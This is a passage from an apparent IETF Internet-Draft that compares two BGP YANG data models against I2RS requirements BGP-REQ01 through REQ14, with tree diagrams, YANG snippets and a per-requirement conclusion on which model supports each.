One BGP requirement (BGP-REQ18) requires a re-computation of the local BGP tables after policies have been modified via the ephemeral interface. The exact methodology of this re-computation could be part of ephemeral soft re-configuration. However, the I2RS WG has not determined how ephemeral state acts. Neither draft has created a mechanism to do the ephemeral state re-configuration, which is wise since the I2RS and netmod WGs should develop a joint ephemeral re-configuration process.
The rest of this draft provides the details, so those who desire only "sound bite" level reading may stop reading now.
2. Definitions and Acronyms
BGP - Border Gateway Protocol version 4
CLI: Command Line Interface
IGP: Interior Gateway Protocol
I2RS: Interface to the Routing System
Information Model: An abstract model of a conceptual domain, independent of any specific implementation or data representation.
INSTANCE: Routing Code often has the ability to spin up multiple copies of itself into virtual machines. Each Routing code instance or each protocol instance is denoted as Foo_INSTANCE in the text below.
NETCONF: The Network Configuration Protocol
3. BGP Yang Draft Comparison
The authors of [I-D.zhdankin-netmod-bgp-cfg] focused on the configuration aspect of BGP (98%+ configuration, 2% status). [I-D.wang-i2rs-bgp-dm] is focused on the I2RS need for status, with a small amount of specific I2RS configuration for I2RS needs (95% status, 2% config). The two drafts could be combined, but guidance is needed from the netmod group since the I2RS state is read-write ephemeral.
Why is draft-wang-bgp-dm-00 mostly focused on routes, statistics, and state?
The use cases specified in [I-D.hares-i2rs-usecase-reqs-summary] demonstrate a need for the status found in [I-D.wang-i2rs-bgp-dm], which includes: bgp-local-rib, bgp-rib-in, bgp-rib-out, and all kinds of statistics and state, such as protocol-status, bgp-rt-state-info, peer-state-info, max-prefix-rcv-limit, etc. The status covers both the AFI state and the BGP peer state (within the AFI).
Two versions of [I-D.zhdankin-netmod-bgp-cfg] have been released: a -00 version and a -01 version. The second (-01) version only updated references to netmod and statements on the YANG modules. This draft will use the -01 version of [I-D.zhdankin-netmod-bgp-cfg].
The [I-D.wang-i2rs-bgp-dm] was released mistakenly as [I-D.hares-i2rs-bgp-dm]. A few corrections to the status fields were included in [I-D.wang-i2rs-bgp-dm]. This draft uses [I-D.wang-i2rs-bgp-dm] for the comparison.
4. Differences between the drafts
[I-D.zhdankin-netmod-bgp-cfg] is composed of two parts: BGP Router Configuration and Prefix Lists. BGP Router Configuration contains three parts: af-configuration, bgp-neighbors, and rpki-config (as shown in Figure 1).
module: bgp
+--rw bgp-router
| +--rw rpki-config
| +--rw af-configuration
| +--rw bgp-neighbors (98% config, 2% state)
+--rw Prefix Lists
+--rw prefix-lists
+--rw prefix-list [prefix-list-name]
+--rw prefix-list-name string
+--rw prefixes
+--rw prefix [seq-nr]
+--rw seq-nr uint16
+--rw prefix-filter
| +--rw (ip-address-group)?
| | +--rw action actions-enum
| | +--rw statistics
| .....
.....
Figure 1: draft-zhdankin-netmod-bgp-cfg structure
[I-D.wang-i2rs-bgp-dm] is written with a status-structure focus that supports manipulation of every concrete route through controlling policy and BGP attributes in different BGP address families. It does not contain the rpki-config. These drafts have ~5% overlap in status/configuration.
module: bgp
+--rw bgp-protocols
| +--rw af-status
| +--rw bgp-local-rib
| +--rw bgp-neighbors (2% config, 98% state)
| | +--rw policy-in
| | +--rw policy-out
| | +--rw peer-state
| | +--rw bgp-rib-in
| | +--rw bgp-rib-out
module: ietf-pcim
+--rw Policy-sets
+--rw Policy-groups
+--rw Policy-Rules
Figure 2: draft-wang-i2rs-bgp-dm-00 structure
The focus is status based on AFI, but it includes the local-rib and each BGP neighbor’s policy (in and out), peer state, rib-in, and rib-out.
Prefix-list policy is covered inline in [I-D.zhdankin-netmod-bgp-cfg], whereas draft-hares-bnp-im-01 uses the policy descriptions created by RFC3060, RFC3460, and other policy work. This methodology is utilized by the OpenDaylight Group policy as well.
Redistribution is done inline in [I-D.zhdankin-netmod-bgp-cfg] as configuration. draft-wang-i2rs-bgp-dm-00 does not configure af-configuration.
[I-D.zhdankin-netmod-bgp-cfg] claims to list the AS-path as well as the prefix configuration, but this section is missing from the draft. For example, the as-path in draft-wang-i2rs-bgp-dm-00 is actually a string value (one of the attributes of a BGP route) rather than a Boolean value as used in [I-D.zhdankin-netmod-bgp-cfg].
The order of specifying the protocol elements differs in some cases due to the status versus configuration focus. For example, limiting maximum prefixes and maximum paths is done in slightly different ways. A second example is the handling of community and cluster strings.
Below is an example of the AF-status structure found in draft-wang-i2rs-bgp-dm-00:
module: bgp-protocol
+--rw bgp-protocol
| +--rw bgp-ipv4-uni-instance
| | | +--rw bgp-local-rib
| | +--rw bgp-peer-list
| | | +--rw bgp-rib-in
| | | | +--rw bgp-rib-out
| | | ...
| +--rw bgp-evpn-instance
| | +--rw bgp-local-rib
| | | +--rw bgp-peer-list
| | | | +--rw bgp-rib-in
| | | | | +--rw bgp-rib-out
figure bgp-3
4.1. Overlap of configuration draft-zhdankin-netmod-bgp-01
The draft-zhdankin-netmod-bgp-01 and draft-wang-i2rs-bgp-dm-00 both contain at the protocol level:
module: bgp
+--rw bgp-router [bgp-protocol]
+--rw local-as-number? uint32
+--rw local-as-identifier inet:ip-address (zhdankin)
+--rw router-id inet:ip-address (wang)
Each module contains, at the peer level, the association of a peer with an AS:
[draft-zhdankin-netmod-bgp-01]
+--rw bgp-neighbors* [AS-number]
+--rw as-number
+--rw (peer-address-type)?
...
+--rw prefix-list prefix-list-ref
+--default-action? enumeration (permit/deny)
[I-D.wang-i2rs-bgp-dm]
+--rw bgp-peer-list* [bgp-peer-name]
+--rw peer-session-address?
...
+--rw peer-name
+--ro peer-type
+--rw bgp-policy-in policy-set-name
+--rw bgp-policy-out policy-set-name
Figure bgp-4
4.2. Unique configuration for draft-zhdankin-netmod-bgp-01
[I-D.zhdankin-netmod-bgp-cfg] contains the unique configuration for RPKI, AF-configuration and BGP peers. A sample of the unique configuration for the AF-configuration is:
o cost-communities
o BGP-damping
o route-aggregation (this is policy, so it could easily be added)
o reflector clients
o best external advertisement
o aggregate timer (sending out aggregate timers)
o flags to compare router-id as part of bgp bestpath selection
o MED-confederation
o administrative distance (cisco)
o packet forwarding over multiple paths
o allowances for slow peers
o BGP multi-path (ECMP peers)
o external fail-over for peer
o AS confederations
o deterministic MEDs
o Graceful-restart
o BGP AS listener only
o Logging of neighbor changes
o Transport options for BGP
o Removal of private AS
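To make the af-configuration list above concrete, here is a purely illustrative YANG sketch of one such knob (BGP damping). The node names are assumptions for illustration, not definitions taken from [I-D.zhdankin-netmod-bgp-cfg]; only the standard RFC2439 damping parameters are assumed.

```yang
// Illustrative sketch only -- node names are assumptions, not taken
// from draft-zhdankin-netmod-bgp-cfg.  The standard RFC 2439 damping
// knobs are shown as an example of an af-configuration feature.
container bgp-damping {
  leaf enabled {
    type boolean;
    default false;
  }
  leaf half-life {
    type uint16;
    units "minutes";
    description
      "Time for a route's flap penalty to decay to half its value.";
  }
  leaf reuse-threshold {
    type uint16;
    description
      "Penalty value below which a suppressed route is re-advertised.";
  }
  leaf suppress-threshold {
    type uint16;
    description
      "Penalty value above which a flapping route is suppressed.";
  }
}
```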
4.3. Unique configuration for draft-wang-bgp-dm-00
The following variables were included in [I-D.wang-i2rs-bgp-dm], but not in [I-D.zhdankin-netmod-bgp-cfg]:
o protocol-status (ro) - needed for I2RS information
o shutdown protocol - needed if I2RS is to shut down the BGP protocol,
o AFI based local-rib
o BGP-peer-status information - [I-D.zhdankin-netmod-bgp-cfg] has the number of updates, but less status information in the draft.
The following pieces are needed by I2RS:
- At instance level, `bgp-instance-name`, `bgp-instance-create` (to create bgp process), `bgp-instance-type` (to specify what type to create),
- At AFI level in local rib, `bgp_route_create` (to add bgp route for i2rs) and `bgp_state_info` for status updates.
- At peer level, there must be maximum prefixes per peer (received and transmit), high water/low water prefix counts, and average number of prefixes;
- Versions for instance publishing,
- Details on path attributes: ASPath strings, community and extended-community attributes, cluster lists, aggregation, atomic aggregator;
- Mechanisms for logging/publishing information
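The instance-level pieces listed above might be rendered in YANG along the following lines. This is a hypothetical sketch: the node names and enum values are assumptions, not definitions from either draft.

```yang
// Hypothetical sketch of the instance-level I2RS pieces listed above;
// names and enum values are assumptions, not the drafts' definitions.
list bgp-instance {
  key "bgp-instance-name";
  leaf bgp-instance-name {
    type string;
  }
  leaf bgp-instance-create {
    type boolean;
    description
      "Written true by an I2RS client to create the BGP process.";
  }
  leaf bgp-instance-type {
    type enumeration {
      enum default;   // assumed value
      enum vrf;       // assumed value
    }
    description "What type of BGP instance to create.";
  }
}
```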
5. Comparison of State needed versus BGP requirements
5.1. BGP-REQ 01
BGP-REQ01 requirement is: I2RS client/agent exchange SHOULD support the read, write, and quick notification of the BGP peer operational state on each router within a given Autonomous System (AS). This operational status includes the quick notification of protocol events that precede a destructive tear-down of a BGP session.
[I-D.zhdankin-netmod-bgp-cfg] contains the following status related to each peer’s bgp operational state.
module: bgp
+-- bgp-router
+ . . .
+-- rw bgp-neighbors
+--rw peer-address
| . . .
+--rw bgp-neighbor-state
| +--rw bgp-peer-admin-status enumeration
| +--rw in-lastupdatetime
Figure bgp-6
Conclusion: [I-D.zhdankin-netmod-bgp-cfg] does not provide the support required by I2RS.
[I-D.wang-i2rs-bgp-dm] contains the following status related to each peer’s BGP operational state:
module: bgp
+--bgp-protocol
+ . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
| . .
+--rw bgp-local-rib
| . .
+--rw bgp-peer-list [bgp-peer-name]
. .
+--rw peer-state-info
| +--rw peer-current-state? peer-state
| +--rw peer-last-state? peer-state
| +--ro peer-down-reason
| +--ro error code? enumeration
| +--ro (sub-error-code-type)?
| +-- ro: (head-error-sub-code)
| +-- ro head-error-sub-value? enumeration
| +-- ro: (open-error-sub-code)
| +-- ro open-error-sub-value? enumeration
| +-- ro: (update-error-sub-code)
| +-- ro-update-error-sub-value? enumeration
| +-- ro: (route-refresh-error-sub-code)
| +-- ro-route-refresh-error-sub-value? enumeration
figure bgp-7
Conclusion: [I-D.wang-i2rs-bgp-dm] provides for this requirement.
5.2. BGP-REQ 02
BGP-REQ02 requirement is: "I2RS client SHOULD be able to push BGP routes with custom cost communities to specific I2RS agents on BGP routers for insertion in specific BGP Peer(s) to aid Traffic engineering of data paths. These routes SHOULD be tracked by the I2RS Agent as specific BGP routes with custom cost communities. These routes (will/will not) be installed via the RIB-Info."
Status:
[I-D.zhdankin-netmod-bgp-cfg] supports configuration related to address family control of these features, but it does not have a route level support. The AFI family configuration is shown in context below:
Conclusion: [I-D.zhdankin-netmod-bgp-cfg] does not adequately support I2RS BGP-REQ02.
[I-D.wang-i2rs-bgp-dm] does support per-route tagging of a route with a custom community in the local BGP RIB, and in the per-peer AdjRibIn and AdjRibOut.
+--bgp-protocol
+ . .
+--rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
| . .
+--rw afi
+--rw safi
+--rw bgp-local-rib
+--rw bgp-route-list* [ipv4-route ipv4-prefix-length]
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+--rw route-type? enumeration
+--rw bgp-attribute-list*
+--rw bgp-origin?
. .
+--rw bgp-extcommattr
+--rw custom-community
+--rw valid boolean
+--rw insertion-point uint8
+--rw community-id uint8
+--rw cost-id uint32
+--rw useextcommsize uint16
+--rw ulrefcount? uint16
+--rw excmmattr-value string
+--rw bgp-peer-list* [bgp-peer-name]
. .
+--rw bgp-rib-in
+--rw bgp-rib-in-list* [ipv4-route ipv4-prefix-length route-distinguisher]
+--rw ipv4-route inet:ipv4-prefix
+--rw bgp-attribute-list*
. .
+--rw bgp-extcommattr
+--rw custom-community
+--rw valid boolean
+--rw insertion-point uint8
+--rw community-id uint8
+--rw cost-id uint32
+--rw useextcommsize uint16
+--rw ulrefcount? uint16
+--rw excmmattr-value string
. .
+--rw bgp-rib-out
+--rw bgp-rib-out-list* [ipv4-route ipv4-prefix-length route-distinguisher]
+--rw ipv4-route inet:ipv4-prefix
+--rw bgp-attribute-list*
. .
Conclusion: [I-D.wang-i2rs-bgp-dm] is needed as well as [I-D.zhdankin-netmod-bgp-cfg].
5.3. BGP-REQ 03
BGP-REQ03 requirement is: "I2RS client SHOULD be able to track via read or notifications all Traffic engineering changes applied via I2RS agents to BGP route processes in all routers in a network."
Discussion on Requirement: Traffic engineering changes can include: ORFs (RFC5291, RFC5292), flow specifications (RFC5575, draft-ietf-), TE performance (draft-ietf-idr-te-pm-bgp-01), traffic-engineering state (draft-ietf-idr-te-lsp-distribution), and route target filtering. Additional input needs to be obtained from the I2RS WG on what constitutes traffic engineering.
Status:
[I-D.zhdankin-netmod-bgp-cfg] has the following potential configuration support:
- on most af configurations: the af-bgp_config container supports the following features: add-path, best-external, aggregation timer, damping, propagating dmz-link-bw, and redistributing iBGP routes into IGP.
- af rtfilters - AFI for rtfilters.
These features do not provide any of the traffic engineering input.
[I-D.wang-i2rs-bgp-dm] has per-route status tracking for the local-rib associated with each AFI, and for the virtual BGP AdjRibIn and BGP AdjRibOut for each peer. Each route has a route type that covers all valid NLRIs, which includes: ipv4, ipv6, labeled ipv4, labeled ipv6, flows, link-state (ls) data, evpn, mvpn, vpls, l2vpn-signaling-nlri, rt-constraint, pw-route.
Figure bgp-10
What needs to be added: Once the I2RS WG specifies what traffic engineering flags to watch on the BGP routes at AFI local-rib level or the BGP-peer routes (AdjRibIn, AdjRibOut), then the [I-D.wang-i2rs-bgp-dm] can be augmented.
If the I2RS WG specifies configurations for traffic engineering at the AFI or BGP-peer level, this ephemeral status will need to be added to the draft-wang-i2rs-bgp-dm-00 status at the AFI or peer level.
5.4. BGP-REQ 04
BGP-REQ04 requirement is: "I2RS Agents SHOULD support identification of routers as BGP ASBRs, PE routers, and IBGP routers."
[I-D.zhdankin-netmod-bgp-cfg]: No status provides a summation of the BGP roles of a BGP routing instance. The BGP-neighbor structure does not provide a role structure.
[I-D.wang-i2rs-bgp-dm]:
The enumeration for bgp-role is asbr, pe, ibgp, rr where the role is a bit mask indicating that one or more peer has this role on the protocol instance.
The enumeration for bgp-peer-type is asbr, ibgp, rr, rr-client, pe, ce, bgp-vendor-types;
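The two role descriptions above could be rendered in YANG roughly as follows. This is a sketch: the enumerated values come from the text, but the typedef names and syntax are an assumed rendering, not necessarily what [I-D.wang-i2rs-bgp-dm] defines.

```yang
// Sketch of the role types described above; the values come from the
// text, but the typedef syntax is an assumed rendering.
typedef bgp-role {
  type bits {
    bit asbr;
    bit pe;
    bit ibgp;
    bit rr;
  }
  description
    "Bit mask: a bit is set when at least one peer has that role
     on the protocol instance.";
}

typedef bgp-peer-type {
  type enumeration {
    enum asbr;
    enum ibgp;
    enum rr;
    enum rr-client;
    enum pe;
    enum ce;
    enum bgp-vendor-types;
  }
}
```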
Conclusion: [I-D.wang-i2rs-bgp-dm] supports BGP-REQ 04
5.5. BGP-REQ 05
BGP-REQ05 is: I2RS client-agent SHOULD support writing traffic flow specifications to I2RS Agents that will install them in associated BGP ASBRs and the PE routers.
Status: BGP-REQ05 requires the ability to read the roles within a BGP protocol instance at the protocol level and at the peer level, and to write routes with traffic flow specifications to the AFI database and (optionally) the bgp-peer AdjRibOut.
BGP-REQ04 showed that [I-D.wang-i2rs-bgp-dm] supports the identification of BGP ASBR and PE routers at the peer level. It also has a quick summary of the roles of BGP routers at the protocol level. [I-D.wang-i2rs-bgp-dm] specifies a route-type variable within each route in the AFI local-rib or the BGP peer’s routes (AdjRibIn, AdjRibOut), and this route-type includes an enumeration value for flows.
[I-D.wang-i2rs-bgp-dm]
Conclusion: [I-D.wang-i2rs-bgp-dm] supports BGP-REQ-05.
5.6. BGP-REQ 06
BGP-REQ06 requirement is: "I2RS Client SHOULD be able to track flow specifications installed within a IBGP Cloud within an AS via reads of BGP Flow Specification information in I2RS Agent, or via notifications from I2RS agent."
Status: As the discussion of BGP-REQ04 shows, [I-D.wang-i2rs-bgp-dm] supports the tracking of flow-specification routes associated with the local-rib for an AFI or a BGP peer.
[I-D.wang-i2rs-bgp-dm]:
module: bgp protocol
+--bgp-protocol
+ . . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
| . . .
+--rw afi
+--rw safi
+--rw bgp-local-rib
+--rw bgp-route-list* [ipv4-route ipv4-prefix-length]
| +--rw ipv4-route inet:ipv4-prefix
| +--rw ipv4-prefix-length uint8
| +--rw route-type? enumeration
Figure bgp-12
module: bgp protocol
+--bgp-protocol
+ . . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
. . .
+--rw bgp-local-rib
+--rw bgp-rib-in-list* [ipv4-route ipv4-prefix-length]
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+--rw route-type? enumeration
. . .
+--rw bgp-peer-list* (bgp-peer-name)
+--rw bgp-peer-session address
+--rw bgp-peer-name
+--rw bgp-peer-type
+--rw bgp-rib-in
+--rw bgp-rib-in-list* [ipv4-route ipv4-prefix-length]
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+--rw route-type? enumeration
Figure bgp-13
5.7. BGP-REQ 07
BGP-REQ07 requirement is: I2RS client-agent exchange SHOULD support the I2RS client being able to prioritize and control BGP’s announcement of flow specifications after reading status information on BGP ASBR and PE router capacity. BGP ASBR and PE router functions within a router MAY forward traffic flow specifications received from EBGP speakers to I2RS agents, so the I2RS Agent SHOULD be able to send these flow specifications from EBGP sources to a client in response to a read or notification.
Discussion: The I2RS WG needs to provide additional input on what status information is key to track for the BGP ASBR and PE router’s capacity.
Status:
[I-D.zhdankin-netmod-bgp-cfg] has prefix-lists which can allow or deny prefixes based on the NLRI family. This feature allows the control of routes via the flow specification NLRI. However, peer status does not provide an easy way to detect BGP ASBR or PE status, or the number of routes.
[I-D.wang-i2rs-bgp-dm] has the ability to specify flexible policy via policy-sets for inbound and outbound policy that can filter based on prefix or any match sequence within the route and peer. This draft also provides a data model that tracks which peers are ASBRs and PEs at the peer level via bgp-peer-type and at the protocol level via bgp-role (as described above). This draft also specifies administrative distance on route structures in the per-AFI bgp-local-rib or in the peer’s routes per AFI.
module: bgp protocol
+--bgp-protocol
+ . . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
. . .
+--rw bgp-local-rib
+--rw bgp-rib-in-list* [ipv4-route ipv4-prefix-length]
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+--rw route-type? enumeration
+--rw route-admin-distance uint32
+--rw route-rpki-origin-validity
+--rw rt-rpki-origin-valid Boolean
+--rw rt-rpki-ref rpki-validity-ref
figure bgp-14
5.8. BGP-REQ 08
BGP-REQ08 requirement is: "I2RS Client SHOULD be able to read BGP route filter information from I2RS Agents associated with legacy BGP routers, and write filter information via the I2RS agent to be installed in BGP RRs. The I2RS Agent SHOULD be able to install these routes in the BGP RR, and engage a BGP protocol action to push these routes to ASBR and PE routers."
Discussion: The router filter information is determined to be the prefix-filters or policy-filters associated with BGP routes found in the AFI based bgp-local-rib or peer’s structures (AdjRibIn, AdjRibOut).
Status:
[I-D.zhdankin-netmod-bgp-cfg] has prefix-lists which can allow or deny prefixes based on the NLRI. This yang model does not provide an easy way to detect peers as taking on the BGP RR, ABSR, and PE. (See section 3.3 and yang model for the prefix-list descriptions).
[I-D.wang-i2rs-bgp-dm] has the ability to specify flexible policy via policy-groups or policy sets for inbound and outbound policy that can filter based on prefix or any match sequence within the route and peer. This draft also provides a data model that tracks which peers are ASBRs, PEs, and RRs at the peer level via bgp-peer-type and at the protocol level via bgp-role. (Please see draft-ietf-i2rs-hares-bnp-info-model and draft-ietf-hares-i2rs-bnp-dm for a full description.)
5.9. BGP-REQ 09
BGP-REQ09: I2RS client(s) SHOULD be able to request the I2RS agent to read BGP routes with all BGP parameters that influence BGP best path decision, and write appropriate changes to the BGP Routes to BGP and to the RIB-Info in order to manipulate BGP routes.
Discussion: Best-path is considered when policy evaluation is the same. The best path could be considered based on origin-as, as-path, router-id, cost-community, igp-metric, med-confed, missing-as-med, rpki-origin validity. This requirement needs to be refined to specify an initial set of BGP parameters that influence BGP best path decisions.
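The best-path inputs named in the discussion above could be gathered into a single per-route grouping, sketched here in YANG. Neither draft defines such a grouping; the leaf names and types are assumptions for illustration only.

```yang
// Hypothetical grouping of the per-route best-path inputs named in
// the discussion; leaf names and types are assumptions.  Assumes an
// import of ietf-inet-types for inet:ip-address.
grouping bgp-bestpath-inputs {
  leaf origin-as         { type uint32; }
  leaf as-path           { type string; }  // a string attribute, per Section 4
  leaf router-id         { type inet:ip-address; }
  leaf cost-community    { type string; }
  leaf igp-metric        { type uint32; }
  leaf med-confed        { type uint32; }
  leaf missing-as-med    { type boolean; }
  leaf rpki-origin-valid { type boolean; }
}
```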
Status:
[I-D.zhdankin-netmod-bgp-cfg] configures the parameters that influence BGP bestpath decisions. However, this draft does not provide these parameters within each bgp-route.
[I-D.wang-i2rs-bgp-dm] provides the per route status on origin-as, as-path, router-id, cost-community, igp-metric, MED, and rpki-origin validity. This route status is on the AFI level local-rib and the per peer routes (AdjRibIn, AdjRibOut).
module: bgp protocol
+--bgp-protocol
+ . . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
+ . . .
+--rw bgp-local-rib
+--rw bgp-rib-in-list* [ipv4-route ipv4-prefix-length]
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+--rw route-type? enumeration
+--rw route-admin-distance uint32
+--rw route-rpki-origin-validity
+--rw rt-rpki-origin-valid Boolean
+--rw rt-rpki-ref rpki-validity-ref
figure bgp-15
5.10. BGP-REQ 10
BGP-REQ10 requirement is: I2RS client SHOULD be able to instruct the I2RS agent(s) to notify the I2RS client when the BGP processes on an associated routing system observe a route change to a specific set of IP Prefixes and associated prefixes. Route changes include: 1) prefixes being announced or withdrawn, 2) prefixes being suppressed due to flap damping, or 3) prefixes using an alternate best-path for a given IP Prefix. The I2RS agent should be able to notify the client via a publish or subscribe mechanism.
Discussion: RFC5277 indicates that a netconf-filter looks for a specific data value and data item. Therefore, the I2RS client must specify whether the data is in the AFI-based local-rib or the BGP (AdjRibIn, AdjRibOut) and the specific values. The specific values indicated by BGP-REQ10 are prefixes with: announce flags, withdrawn flags, flap-dampened suppression flags, on-best-path-external, or rejected due to best-path external. This comparison assumes the RFC5277 paths can be made to work for the ephemeral storage.
Sorting of these filters into critical or normal status requests is not considered in this comparison as adding this upon a non-existent definition of ephemeral services seems futile.
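As a sketch of what such a notification might carry, the route changes of BGP-REQ10 could be modeled as shown below. This is hypothetical: neither draft defines this node, and the names are assumptions.

```yang
// Hypothetical notification for the BGP-REQ10 route changes; node
// names are assumptions.  Assumes an import of ietf-inet-types.
notification bgp-route-change {
  leaf prefix {
    type inet:ipv4-prefix;
  }
  leaf change-type {
    type enumeration {
      enum announced;
      enum withdrawn;
      enum flap-damping-suppressed;
      enum alternate-best-path;
    }
  }
}
```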
[I-D.zhdankin-netmod-bgp-cfg] configures the parameters that influence BGP bestpath decisions or flap damping. However, this draft does not provide these parameters within each bgp-route.
[I-D.wang-i2rs-bgp-dm]:
Hares Expires April 30, 2015 [Page 20]
typedef rib-state-def {
  type enumeration {
    enum "active";
    enum "in-active";
    enum "primary";
    enum "backup";
    enum "suppressed (flap dampened)";
    enum "suppressed non-flap dampen";
    enum "active on alternate best path";
  }
}

leaf not-preferred-reason {
  type enumeration {
    enum "peer-address";
    enum "router-id";
    enum "cluster-list-length";
    enum "igp-metric";
    enum "peer-type";
    enum "origin";
    enum "weight-or-preferred-value";
    enum "local-preference";
    enum "route-type";
    enum "as-path-length";
    enum "med";
    enum "flap-dampened route";                            [new]
    enum "not-this-path-prefix-uses-alternate-best-path";  [new]
    enum "overlapping-route-marked-to-remove";             [new] (BGP-REQ17)
  }
}
Figure bgp-16
Conclusion: [I-D.wang-i2rs-bgp-dm] status is needed for this BGP-REQ10.
5.11. BGP-REQ 11
BGP-REQ11 requirement is the "I2RS client SHOULD be able to read BGP route information from BGP routers on routes received but rejected from ADJ-RIB-IN due to policy, on routes installed in ADJ-RIB-IN, but not selected as best path, and on routes not sent to IBGP peers (due to non-selection)."
Discussion: As discussed in BGP-REQ10, RFC5277 indicates that a netconf-filter looks for a specific data value and data item. Therefore, the I2RS client must specify whether the data is in the AFI based local-rib or the BGP (AdjRibIn, AdjRibOut) and the specific values.
Status:
[I-D.zhdankin-netmod-bgp-cfg] configures policy that indicates what routes are filtered, but it does not provide the status parameter on each BGP route.
[I-D.wang-i2rs-bgp-dm]: Shows that the status can be tracked in the AFI based bgp local-rib and the per AFI per peer AdjRibIn and AdjRib out.
Conclusion: [I-D.wang-i2rs-bgp-dm] status is needed for BGP-REQ11.
5.12. BGP-REQ 12
BGP-REQ12 requirement is: the "I2RS client SHOULD be able to request the I2RS agent to read installed BGP Policies."
Discussion: BGP policies can be inbound filters, ACLs, or route maps. Three YANG drafts take different approaches to the filters: draft-bogdanovic-netmod-acl-model-02, [I-D.zhdankin-netmod-bgp-cfg], and draft-hares-i2rs-bnp-dm-01.
The draft-bogdanovic-netmod-acl-model-02 takes the approach of extending the firewall ACLs, and suggests that proprietary methods be used to extend this to the ranges needed for BGP policy. The index to the ACLs is the rule-name. For a single prefix accept/deny, the generic ACL policy may be sufficient. Prefix ranges or the ability to set custom cost communities or other extended communities must use a proprietary vendor's model.
The [I-D.zhdankin-netmod-bgp-cfg] (10/1/2014) provides prefix-list matches indexed by a sequence number (uint16). The prefix matches can be an ip-address, prefix, host address, or prefix-range. The only actions taken are accept or deny the prefix. The usage statistics contain only the "hit count" for the usage of the prefix mask.
The [I-D.wang-i2rs-bgp-dm] (10/23/2014) provides a policy link to the Basic Network Policy (draft-hares-i2rs-bnp-info-model/draft-hares-i2rs-bnp-dm-01) which provides ordered list of policy rules that can provide sequences of match, actions (accept/deny, set variable, and modify). A group of these policy rules is called a policy group which can be named.
This policy definitions concept is also found in the Policy Core Information Model (PCIM) (RFC3060), the Quality of Service Policy Information Model (QPIM) (RFC3644), and policy-based routing. ACL-based policy (draft-bogdanovic-netmod-acl-model-02) and prefix-list policy (accept/deny) can be policy rule extensions. The [I-D.zhdankin-netmod-bgp-cfg] can provide a second policy rule extension.
The section below provides the specific modeling parameters for each draft.
draft-bogdanovic-netmod-acl-model-02
```
+-rw access-list-entry* [rule-name]
+-rw rule-name string
+-rw matches
| +-rw (ace-type)?
| +-:(ace-ip)
| | +-rw source-port-range
| | +-rw lower-port inet:port-number
| | +-rw upper-port? inet:port-number
| +-rw destination-port-range
| | +-rw lower-port inet:port-number
| | +-rw upper-port? inet:port-number
| +-rw dscp? inet:dscp
| +-rw ip-protocol? uint8
| +-rw (ace-ip-version)?
| +-:(ace-ipv4)
| | +-rw destination-ipv4-address?
| | inet:ipv4-prefix
| | +-rw source-ipv4-address?
| | inet:ipv4-prefix
| +-:(ace-ipv6)
| | +-rw destination-ipv6-address?
| | inet:ipv6-prefix
| | +-rw source-ipv6-address?
| | inet:ipv6-prefix
| +-rw flow-label? inet:ipv6-flow-label
```
Internet-Draft IM for policy October 2014
```
|  +-:(ace-eth)
|     +-rw destination-mac-address?        yang:mac-address
|     +-rw destination-mac-address-mask?   yang:mac-address
|     +-rw source-mac-address?             yang:mac-address
|     +-rw source-mac-address-mask?        yang:mac-address
|  +-rw input-interface?                   string
|  +-rw absolute
|     +-rw start?     yang:date-and-time
|     +-rw end?       yang:date-and-time
|     +-rw active?    boolean
+-rw actions
|  +-rw (packet-handling)?
|     +-:(deny)
|     |  +-rw deny?      empty
|     +-:(permit)
|        +-rw permit?    empty
+-ro ace-oper-data
   +-ro match-counter?   ietf:counter64
```
Figure bgp-17
[I-D.zhdankin-netmod-bgp-cfg] (10/1/2014)
+-rw prefix-lists
   +-rw prefix-list [prefix-list-name]
      +-rw prefix-list-name     string
      +-rw prefixes
         +-rw prefix [seq-nr]
            +-rw seq-nr            uint16
            +-rw prefix-filter
            +-rw (ip-address-group)?
            |     (cases)
            +-rw action            actions-enum
            +-rw statistics
Figure bgp-18
[I-D.wang-i2rs-bgp-dm]
5.13. BGP-REQ 13
BGP-REQ13 requirement is: the "I2RS client SHOULD be able to instruct the I2RS Agent to write BGP Policies into the running BGP protocols and into the BGP configurations."
Discussion: BGP-REQ 13 indicates that the policy changes supported by BGP-REQ 12 must be able to operate in the running configuration. The I2RS and netmod groups are discussing the definition of ephemeral. Two definitions are being discussed - patch and pull-up configuration as described below:
running = config + ephemeral patches [patch]
running = config (copy) + ephemeral additions (pull-up)
Either definition implies that I2RS changes can alter the policy based on the BGP configuration and the I2RS model.
The writing of changes from I2RS to the configuration was specifically ignored. Writing of specific configuration options from the ephemeral store to the running configuration can initially be done by the I2RS client writing via the configuration interface to the datastore.
Data models needed: The policy data models for filter, or filter and action, are the same as in BGP-REQ12.
5.14. BGP-REQ 14
BGP-REQ14 requirement is: the "I2RS client-agent SHOULD be able to read BGP statistics associated with Peer, and to receive notifications when certain statistics have exceeded limits. An example of one of these protocol statistics is the max-prefix limit."
Discussion: BGP-REQ01 examines the peer connectivity state. BGP-REQ14 examines BGP peer statistics. [I-D.zhdankin-netmod-bgp-cfg] provides statistics on the number of updates received or sent, but it does not have statistics on the max-prefix exceeded. It does provide a limit for maximum-prefix per peer.
[I-D.wang-i2rs-bgp-dm] has statistics on the number of updates received or sent, number of routes received or sent plus maximum prefix high-water and low-water. This draft also has the limits copied into the status fields for easy reading.
[I-D.zhdankin-netmod-bgp-cfg] (10/1/2014)
module: bgp
+ ....
+--rw bgp-neighbors
| +--rw bgp-neighbor [as-number]
| +--rw as-number uint32
| +--rw (peer-address-type)?
| ....
| +--rw prefix-list? prefix-list-ref
| +--rw default-action? actions-enum
| +--rw af-specific-config
| +--ro bgp-neighbor-state
| +--ro bgp-peer-admin-status
| +--ro bgp-neighbor-statistics
| +--ro nr-in-updates
| +--ro nr-out-updates
[I-D.wang-i2rs-bgp-dm]
Conclusion: Full support of BGP-REQ 14 requires the [I-D.wang-i2rs-bgp-dm] draft.
